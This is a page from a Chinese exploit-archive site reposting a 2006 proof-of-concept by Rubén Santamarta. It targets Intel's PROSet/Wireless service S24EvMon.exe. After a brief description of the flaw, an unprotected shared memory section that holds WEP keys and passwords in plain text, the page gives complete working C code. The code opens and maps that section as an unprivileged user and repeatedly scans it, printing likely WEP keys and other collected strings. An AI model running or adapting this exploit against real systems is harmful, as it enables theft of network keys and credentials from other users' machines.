首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Intel Wireless Service (s24evmon.exe) Shared Memory Exploit
来源:www.reversemode.com 作者:ruben 发布时间:2006-05-10  

///////////////////////////////////////////////////////////////////////
//// S24EvMon.exe Intel Wireless Management Service KEY Hunter
//// Rubén Santamarta
//// ruben@reversemode.com
//// www.reversemode.com
//// 28/04/2006
///////////////////////////////////////////////////////////////////////

/**********************************************************************************************************
* Testing a vuln-finder application that I am developing, I found a flaw within S24EvMon.exe.
* It is a service which is part (at least) of the Intel PROset/Wireless software. This application
* is provided by Intel in order to support intel Wireless Devices based on Spectrum 24 chipsets.
*
* This service uses a shared memory section which is created without the proper security descriptor,
* allowing unprivileged users to perform operations like Delete, Read or Write into the memory. The
* section is named S24EventManagerSharedMemory
*
* This shared memory is used to store ,in plain text, confidential information like WEP Key, Passwords...
*
* The successful exploitation of this vulnerability could allow to any unprivileged user to access
* confidential information,exposing the network. An important mitigating factor is that the
* vulnerability is local, nevertheless some Malware could take advantage of this flaw.
**********************************************************************************************************/

#include <windows.h>
#include <stdio.h>

#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}

#define InitializeUnicodeStr(p,s) { \
(p)->Length= wcslen(s)*2; \
(p)->MaximumLength = wcslen(s)*2+2; \
(p)->Buffer = s; \
}


typedef struct _SECTION_BASIC_INFORMATION {
ULONG d000;
ULONG SectionAttributes;
LARGE_INTEGER SectionSize;
} SECTION_BASIC_INFORMATION;

typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
UNICODE_STRING *ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

typedef DWORD (WINAPI* PQUERYSECTION)(HANDLE, DWORD, PVOID,DWORD,DWORD*);

typedef DWORD (WINAPI* POPENSECTION)(HANDLE*, DWORD,OBJECT_ATTRIBUTES* );


VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}

int main(int argc, char* argv[])
{
OBJECT_ATTRIBUTES SectionAttributes;
SECTION_BASIC_INFORMATION buff;
PQUERYSECTION NtQuerySection;
POPENSECTION NtOpenSection;
char * sMap,cString[256];
UNICODE_STRING uStr;
LPVOID lpMapAddress;
DWORD i,b=0,c=0;
HANDLE hSection;


NtOpenSection = (POPENSECTION) GetProcAddress( LoadLibrary( "ntdll.dll" ),
"NtOpenSection" );

NtQuerySection = (PQUERYSECTION) GetProcAddress( LoadLibrary( "ntdll.dll"),
"NtQuerySection" );

InitializeUnicodeStr(&uStr,L"\\BaseNamedObjects\\S24EventManagerSharedMemory");
InitializeObjectAttributes(&SectionAttributes, &uStr,NULL, NULL, NULL );


NtOpenSection( &hSection, SECTION_MAP_READ|SECTION_QUERY, &SectionAttributes );

if (hSection == NULL) ShowError();
printf("Section opened successfully.\n");

lpMapAddress = MapViewOfFile(hSection, FILE_MAP_READ, 0, 0, 0);
if (lpMapAddress == NULL) ShowError();

if (NtQuerySection(hSection,0,&buff,sizeof(buff),0)) ShowError();

sMap= ( char* )lpMapAddress;
printf("Scanning section...\n\n");

while(c<100)
{

c++;
printf("\nSNAPSHOT ID[%d]----------------[BEGIN]\n\n",c);

for (i=0; i< buff.SectionSize.QuadPart; i++)
{

if( sMap[i]> 0x29 )
{
while( sMap[i] != 0x0 )
{
if( sMap[i]>=0x30 )
{
cString[b] = sMap[i];
b++;
}
i++;
}

cString[b++]='\0';
// less 3 characters should be GARBAGE
if( b>3 && b!=14 && b!=27 ) printf(" String collected: %s\n",cString);
// Alphanumeric WEP KEY (13 characters)
if( b==14 ) printf("### Possible Alphanumeric WEP KEY found: %s\n",cString);
if( b==27 )
{
if(cString[0]!=0x30 && cString[2]!=0x30 && cString[6]!=0x30)
printf("### Possible WEP KEY found(Ascii/HexMode): %s\n",cString);
else
printf(" String collected: %s\n",cString);
}
b=0;
}

}
printf("\nSNAPSHOT ID[%d]----------------[END]\n",c);

Sleep(1000);
}

CloseHandle(hSection);

return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ActualAnalyzer Pro <= 6.88
·MS Internet Explorer <= 6.0
·Claroline e-Learning 1.75 (lda
·Medal of Honor (getinfo) Remot
·Dokeos LMS <= 1.6.4 (authld
·Unclassified NewsBoard <= 1
·ISPConfig <= 2.2.2 (session
·Foing <= 0.7.0 (phpBB) Remo
·Jetbox CMS <= 2.1 (relative
·phpBB <= 2.0.20 (Admin/Rest
·PHP-Fusion <= 6.00.306 Mult
·Sugar Suite Open Source <=
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved